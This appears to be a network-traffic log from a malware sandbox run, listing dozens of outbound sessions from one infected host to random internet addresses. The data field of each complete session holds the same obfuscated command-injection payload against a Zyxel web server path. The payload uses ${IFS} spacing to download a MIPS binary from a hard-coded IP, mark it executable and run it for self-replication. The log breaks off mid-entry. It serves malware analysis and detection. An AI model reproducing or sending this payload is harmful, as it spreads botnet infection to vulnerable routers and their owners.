                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4551192.168.2.135780060.11.9.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203517914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4552192.168.2.1356576109.164.179.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203577042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4553192.168.2.1344132168.69.29.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203655958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4554192.168.2.1354374207.191.109.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203701019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4555192.168.2.1353850125.162.111.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203746080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4556192.168.2.1355716148.80.107.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203816891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4557192.168.2.135220278.179.115.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203906059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4558192.168.2.134661099.31.218.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204000950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4559192.168.2.1355140187.100.210.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204034090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4560192.168.2.1340584169.47.252.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204077959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4561192.168.2.1347948176.157.116.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204121113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4562192.168.2.1360656208.171.255.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204205036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4563192.168.2.133511483.224.126.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204267979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4564192.168.2.1337742143.188.160.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204305887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4565192.168.2.135494672.214.89.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204407930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4566192.168.2.1334994131.99.170.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204432964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4567192.168.2.1343582155.34.89.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204498053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4568192.168.2.13384089.247.151.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204555988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4569192.168.2.1339602135.91.213.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204600096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4570192.168.2.135178298.5.215.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204659939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4571192.168.2.1338626152.182.206.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204700947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4572192.168.2.1339372115.179.159.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204766035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4573192.168.2.136019871.92.6.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204818964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4574192.168.2.1352346134.50.37.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204881907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4575192.168.2.1351642111.138.176.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.204931021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4576192.168.2.135189475.117.191.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205007076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4577192.168.2.134342288.95.182.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205076933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4578192.168.2.1348240106.179.127.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205122948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4579192.168.2.1356828150.219.19.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205190897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4580192.168.2.133770412.155.192.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205257893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4581192.168.2.135864671.48.168.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205288887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4582192.168.2.135594444.171.74.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205359936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4583192.168.2.1337364155.222.180.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205406904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4584192.168.2.1343600146.170.148.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205470085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4585192.168.2.1358806133.156.83.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205538034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4586192.168.2.1334428108.213.67.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205591917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4587192.168.2.1334070194.99.245.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205657005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4588192.168.2.1338962150.87.109.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205694914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4589192.168.2.135019684.115.87.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205744028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4590192.168.2.1347618115.225.215.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205796957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4591192.168.2.133970019.101.81.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205874920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4592192.168.2.1334364210.255.91.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205951929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4593192.168.2.1345336182.37.156.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.205998898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4594192.168.2.135514213.176.137.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206077099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4595192.168.2.1347206169.24.140.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206110954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4596192.168.2.1350752205.47.136.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206173897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4597192.168.2.1343492186.241.204.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206229925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4598192.168.2.1360848188.4.213.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206300020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4599192.168.2.13397649.205.150.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206351042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4600192.168.2.1335358223.6.66.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206413031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4601192.168.2.1343980101.130.146.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206471920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4602192.168.2.1340952181.226.228.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206497908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4603192.168.2.133584275.55.213.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206573009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4604192.168.2.1337310129.228.238.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206608057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4605192.168.2.1338892168.88.148.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206660986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4606192.168.2.133521835.243.19.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206718922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4607192.168.2.1355198101.51.250.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206779957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4608192.168.2.136060852.47.255.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206842899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4609192.168.2.134065489.186.68.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206887007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4610192.168.2.1349458172.155.170.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206962109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4611192.168.2.1349620105.96.53.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.206985950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4612192.168.2.134175618.66.242.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207046986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4613192.168.2.133349654.116.148.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207130909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4614192.168.2.1339852124.220.196.26443
                                    TimestampBytes transferredDirectionData
